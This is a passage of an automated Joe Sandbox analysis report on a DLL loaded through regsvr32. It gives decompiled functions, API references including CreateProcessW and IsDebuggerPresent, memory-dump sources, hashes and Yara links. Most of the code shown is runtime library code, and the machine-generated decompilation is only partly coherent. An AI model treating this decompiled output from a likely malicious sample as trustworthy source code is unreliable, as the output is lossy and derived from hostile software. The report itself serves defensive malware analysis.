RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9F2
GetLastError.KERNEL32(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9FC

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction ID: 29a5052ed613cd8666c2a0b15a52358528e9451699c4a0681b84363b2f2468a8
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 1DE08C10F0960382FF186FF2B8680391198DF9FB00F40D034C90D43392EE2CB86D8604

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000003.00000002.324141127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F22B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA094F22B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F2830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0x94f22de;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0x94f2310;
				E00007FFA7FFA094F2170(_t48, _a8);
				E00007FFA7FFA094F2600(_a8, _a16,  *_t48); // executed
				goto 0x94f237a;
				if ((_a24 & 0x000000ff) == 0) goto 0x94f2366;
				if (_a16 - 0x10 >= 0) goto 0x94f2366;
				E00007FFA7FFA094F2170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0x94f2341;
				_t50 = _a16;
				_v16 = _t50;
				goto 0x94f2353;
				E00007FFA7FFA094F2170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFA7FFA094F1910(1,  *_t50, _a8, _v16);
				goto 0x94f237a;
				if (_a16 != 0) goto 0x94f237a;
				E00007FFA7FFA094F23A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0x94f238c;
				_v24 = 1;
				goto 0x94f2394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

APIs

Part of subcall function 00007FFA094F2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F283E
Part of subcall function 00007FFA094F2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA094F284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F22D9

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: 3eda08541378eb08580e619e138bb9af3b04931b8d256b2577e0c7e686a48f09
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: 1F21DD6290CA4381EA109F35F46036E6770FBCA794F608431E79D477A9CEBED964CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0950060C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0950060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x9500654;
				E00007FFA7FFA094FB420(__rax);
				 *__rax = 9;
				E00007FFA7FFA094F9744();
				return 9;
			}

0x7ffa0950060c
0x7ffa09500611
0x7ffa09500616
0x7ffa09500629
0x7ffa0950062b
0x7ffa09500635
0x7ffa09500637
0x7ffa09500653

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA09500637

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction ID: ac74fe8bbe8aa36f13fff6aafdadda5039925479d827e977748b561323b597eb
Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction Fuzzy Hash: F6116D3291864282F3109F36F44067962A9EBCA780F158134EA8D4BBD2DF3CF814CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FAAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094FAAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x94faaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x94fab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x94fab16;
				if (E00007FFA7FFA094FE958() == 0) goto 0x94fab32;
				if (E00007FFA7FFA094F97EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x94fab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x94fab01;
				goto 0x94fab3f;
				E00007FFA7FFA094FB420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA094FBAAE,?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000), ref: 00007FFA094FAB25

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: 8e656ab33577bda0e038e1e59a60e2edfccffe44ccba7957ee20e4d7d42a3ad3
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: 93F01D44B0A30781FE545F72B5613B552869F5FB44F4CD430CA0E863D1FD2EE8A5C220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FAA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094FAA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x94faa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x94faa4a;
				if (E00007FFA7FFA094FE958() == 0) goto 0x94faa63;
				if (E00007FFA7FFA094F97EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x94faa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x94faa35;
				goto 0x94faa70;
				E00007FFA7FFA094FB420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffa094faa25
0x7ffa094faa2f
0x7ffa094faa33
0x7ffa094faa3c
0x7ffa094faa48
0x7ffa094faa56
0x7ffa094faa5f
0x7ffa094faa61
0x7ffa094faa63
0x7ffa094faa68
0x7ffa094faa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFA0950040D,?,?,00000000,00007FFA094FD8B7,?,?,?,00007FFA094FA427,?,?,?,00007FFA094FA31D), ref: 00007FFA094FAA56

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: 8477bf89d3e262464e09915c53d3c7349ca3aac162532ee85f722edf5e01c2b2
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 1DF0F811E1D60745FA646FB2BA6167611849F4FBA0F0C8730DD2E863D1EE6EA469C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA094F1B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F11A0(_a16);
				_t7 = E00007FFA7FFA094F1B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffa094f1b10
0x7ffa094f1b10
0x7ffa094f1b15
0x7ffa094f1b23
0x7ffa094f1b35
0x7ffa094f1b3e

APIs

char_traits.LIBCPMTD ref: 00007FFA094F1B23

Part of subcall function 00007FFA094F1B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1B6E

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: ed0666e2c7f693742cefc13ce91d634f4be802b0ddba663bb24a9e298cfd217b
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 88D09E6692DA82C1D544EF22F89105AA760EBCD7C0F409435FA8E42B2ADE29C1618B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA094F9474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA094F9474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0x956e008; // 0x36754d591002
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0x94f94b3;
				E00007FFA7FFA094F493C(_t36);
				r8d = 0x98;
				E00007FFA7FFA094F6920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFA7FFA094F6920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0x94f9546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x94f95a8;
				if (_t40 != 0) goto 0x94f95a8;
				if (_t45 == 0xffffffff) goto 0x94f95a8;
				return E00007FFA7FFA094F3A70(E00007FFA7FFA094F493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFA094F94ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFA094F9505
RtlVirtualUnwind.KERNEL32 ref: 00007FFA094F9540
IsDebuggerPresent.KERNEL32 ref: 00007FFA094F9579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA094F9583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFA094F958E

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: 5e0d49c2189e7d89a5ce06d75ab4525dcfa1dc262e2b49a36018c5b2778ba57d
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: 7D315E36608B8286DB648F75F8507AE73A4FB8A754F504135EA8D43B98EF39D159CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F3240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA094F3240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F21F0(__eflags, __rax, _a8, _a16);
				E00007FFA7FFA094F21F0(__eflags, __rax, _a32, _a40);
				E00007FFA7FFA094F2400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFA7FFA094F2400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFA7FFA094F2170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0x94f3315;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFA7FFA094F2170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFA7FFA094F2170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0x94f338e;
				r8d = 0;
				E00007FFA7FFA094F22B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0x94f33ec;
				E00007FFA7FFA094F18D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFA7FFA094F18F0(_t218 + _a40, _a8);
				E00007FFA7FFA094F1230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0x94f3810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0x94f34a2;
				E00007FFA7FFA094F18F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFA7FFA094F18F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t225, _v104, _v136);
				E00007FFA7FFA094F18D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFA7FFA094F18F0(_t225 + _a40, _a8);
				E00007FFA7FFA094F11E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0x94f3810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0x94f3558;
				E00007FFA7FFA094F18F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFA7FFA094F18F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFA7FFA094F1230(_t230, _v88, _a48);
				E00007FFA7FFA094F18F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFA7FFA094F18F0(_t230 + _a16 + _a24, _a8);
				E00007FFA7FFA094F1230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0x94f3810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0x94f360e;
				E00007FFA7FFA094F18F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFA7FFA094F18F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t239, _v72, _v136);
				E00007FFA7FFA094F18F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFA7FFA094F18F0(_t239 + _a40, _a8);
				E00007FFA7FFA094F1230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0x94f3810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0x94f36eb;
				E00007FFA7FFA094F18F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFA7FFA094F18F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFA7FFA094F1230(_t247, _v56, _v136);
				E00007FFA7FFA094F18F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFA7FFA094F18F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFA7FFA094F1230(_t249, _v48, _a48);
				goto 0x94f3810;
				E00007FFA7FFA094F18F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFA7FFA094F18F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFA7FFA094F1230(_t251, _v40, _a24);
				E00007FFA7FFA094F18F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFA7FFA094F18F0(_t251 + _a16 + _a24, _a8);
				E00007FFA7FFA094F1230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFA7FFA094F18F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFA7FFA094F18F0(_t257 + _a40 + _a48, _a8);
				E00007FFA7FFA094F1230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFA7FFA094F23A0(_t259 + _a16 + _a24, _a8, _v128);
			}

APIs

Part of subcall function 00007FFA094F21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F2217

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F3310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F33C2
char_traits.LIBCPMTD ref: 00007FFA094F33E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F342C
char_traits.LIBCPMTD ref: 00007FFA094F3451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F345E

Part of subcall function 00007FFA094F18D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3478
char_traits.LIBCPMTD ref: 00007FFA094F3498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F340A

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F34C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F34DA
char_traits.LIBCPMTD ref: 00007FFA094F34FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F3529
char_traits.LIBCPMTD ref: 00007FFA094F354E

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction ID: bd6af4020072f200f0b1ea20aee84bb8cc730cfed14bc8f787f7053d90ea7420
Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction Fuzzy Hash: D9D19566A1DBC281DA70DF65F4A13AAB361FBCD784F008126DA8D53B6ADF2DD054CB01

Uniqueness

Uniqueness Score: -1.00%

